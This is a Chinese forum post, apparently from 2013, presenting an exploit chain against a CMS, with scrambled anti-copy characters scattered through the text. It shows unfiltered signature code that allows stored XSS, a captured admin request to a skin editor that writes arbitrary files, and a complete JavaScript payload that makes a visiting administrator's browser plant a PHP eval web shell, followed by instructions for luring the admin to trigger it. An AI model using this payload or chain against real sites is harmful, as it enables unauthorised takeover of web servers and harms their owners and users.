|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题2 P. S) ~( U* [% e9 Q" ]& C
官网已经修补了,所以重新下了源码
- R3 i! \$ U8 i' I3 y5 ~因为 后台登入 还需要认证码 所以 注入就没看了。$ O& K9 O" d- W s o
存在 xss
$ x; {3 W3 {7 I. I漏洞文件 user/member/skin_edit.php
6 Y. E/ [9 }3 R. F0 l- Z本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
$ }: a5 x4 r+ ^0 C' G3 N
- A8 p( U: U4 }</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>$ @6 [* \/ j: y- @3 E; w! i
& R7 D a9 j& O- h- O6 O/ m</textarea></td></tr> A% y, ^' ? }/ {7 D
( B) k9 i& X! Y user/do.php
5 V! B5 Y7 v# X
+ p' | C, o6 A" v1 R. `. R
4 J1 L+ `* ^' x/ l, R! i" z, ?6 jif($op=='zl'){ //资料
+ e5 q {: |% }5 i3 D; `. Q 5 y# q9 V/ e. {% n$ s
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
u \$ \- y- W6 _; g4 ]) M2 T( Y6 G exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
7 V% }5 ]' w7 n. Z6 g 5 [1 X" d$ C7 K0 r& w
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
1 w! B; U. E8 u; ` }" ~" O8 e / P, A6 h3 x9 @- Y: w
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
, I2 h6 V4 W; ~9 G, T where CS_Name='".$cscms_name."'";& D* V* h- j$ q1 Y$ {
+ D, `; T i, D g6 H
if($db->query($sql)){ `7 g" I( Q3 d
* T8 F6 V1 V4 B exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));' ~& C- p5 M0 O$ g
K2 i9 M- Y, F' m5 R- E+ ~
}else{
+ w. i1 K+ [9 } k" I! p ! p; ?+ t, L+ ~, y! F* [' a4 g) Q
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));7 A8 k! t' e' @( x
- p$ G6 F2 p! }) C+ l; s; F
}) p4 d; P) v+ D$ W$ Y- p- r2 P
0 q m8 [2 o3 ?% I9 d* t
; c# @2 N1 Q6 ^# u/ K没有 过滤导致xss产生。* ?+ V, S5 L+ B& j
后台 看了下 很奇葩的是可以写任意格式文件。。
) C4 C1 o5 ]) A+ J抓包。。+ d: r( R4 y2 c& [2 v9 T3 ]
1 B1 q( V, q0 S
/ t% T5 \' b; f X本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
! K; z& U F; h4 h) l' M : X+ l4 o( y& B- ^3 U! F
Accept: text/html, application/xhtml+xml, */*
6 e! N T4 P9 o: }: Z& z
8 z; L5 m! s$ B8 ^ UReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
6 J$ R7 W1 u( Z, p( ]& b 1 S6 i% V5 n2 C. U; O* u
Accept-Language: zh-CN6 e; [# G, r" H8 _
/ o; y, i1 S0 r" H/ h' @User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
# g1 {" _8 r) q* U+ H9 [
' C' {% ~9 F# JContent-Type: application/x-www-form-urlencoded
6 {0 v3 F2 a. |6 T: ^
0 p/ n. ~ o5 m* [& F% T2 [ JAccept-Encoding: gzip, deflate5 M( [- V. c6 ?8 ^' W/ Z
" R6 g9 X5 T g2 z1 rHost: 127.0.0.1% v0 f7 v; V) p7 P9 d
) t5 D; T. ` L9 v4 K- m# s* f) |Content-Length: 38" ` R4 D- d, `+ `/ O% a
3 ^, [! E" a5 {$ WDNT: 1% n8 }' q+ e5 \0 j
4 z$ D1 ^1 o6 ~4 P+ WConnection: Keep-Alive
# j, W _% X' C+ O, C
( c. J( d: ?# m4 M4 e: kCache-Control: no-cache
1 d5 g9 I2 j) [. K* [9 e, I
( ^3 y, o+ |) UCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
7 t: u; k C: d' H! ^
7 Q; S" o/ e G$ h, c- B4 m& _9 k, @ R8 I& {! D
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
6 {$ F' l; a+ P- f6 k& q1 }) a! V! Q& B1 M5 G' E( S j
' c9 s5 e' D( t7 y- R' F
/ M3 I( N4 D$ [
于是 构造js如下。, e9 p2 R2 k8 F+ d1 g1 L0 g8 Z
4 |/ m M/ c$ m1 k) @/ F" W7 C6 B$ `
本帖隐藏的内容<script>
- U( i: K- j& ~' F R9 YthisTHost = top.location.hostname;. j1 _% \0 a# O" I1 d) L: M6 U
8 p7 a2 {1 ~: t1 HthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
" t/ r' l, l6 Y8 G$ \ y - A! L/ [. j( D9 R) w
function PostSubmit(url, data, msg) { " p( N2 u) {( b' [
var postUrl = url;
5 P4 v5 E9 B, X6 m' V/ m+ ]5 ?1 _
) W7 i) \! e9 U5 i3 y/ M$ S var postData = data; ( ^, c& y; e3 ?3 D! \1 c6 m
var msgData = msg; / u5 b. n: P9 t' U3 f) A
var ExportForm = document.createElement("FORM"); , H4 B8 Y! m3 h# R( ?
document.body.appendChild(ExportForm); ' B# b: p0 k9 c
ExportForm.method = "POST"; 7 h2 U' z9 r6 [
var newElement = document.createElement("input"); * c! [5 @1 i5 ?& ~( [/ ^
newElement.setAttribute("name", "name");
3 C6 m) \2 c0 M; h8 ~0 m9 s newElement.setAttribute("type", "hidden");
, s( X4 i, t7 ~6 Z/ R1 \# p var newElement2 = document.createElement("input"); : V& h1 O( A7 s1 X' d
newElement2.setAttribute("name", "content"); , a8 Y1 k- o. B6 J: v# I
newElement2.setAttribute("type", "hidden");
, H3 H+ p4 e4 n7 l9 K ExportForm.appendChild(newElement);
8 ]" A3 W$ N" P7 P7 J8 |3 C ExportForm.appendChild(newElement2);
6 J/ a+ N& f4 X$ } newElement.value = postData; 8 v: @: A1 K! x9 a
newElement2.value = msgData;
! y/ ~! a/ K' G2 H( v" @3 P' e; b ExportForm.action = postUrl; 7 C- h) ^1 W8 A7 w" D% v
ExportForm.submit(); 7 G" q4 Q: b5 J- p/ k& l* `. f2 ?7 p
};! H6 _0 Y7 V1 z5 Q, W; l2 l
) I. f/ e' q( K& U- _8 ^8 T0 j+ J
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
6 K+ ]5 t5 Z8 s0 F+ I" e
' z( t2 W& f$ A" Q7 F" q2 {</script>
7 M6 _" p7 f7 Z2 L/ G9 x3 a8 `) t3 `# z
A' l9 b0 N6 W& L" }
" v8 j" y: S# P% ^/ thttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入7 V6 c" f5 P, w. j2 d, y) Q
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)8 F6 }7 l% J, |# m+ X, Y
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
& W. P3 u8 \* d |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对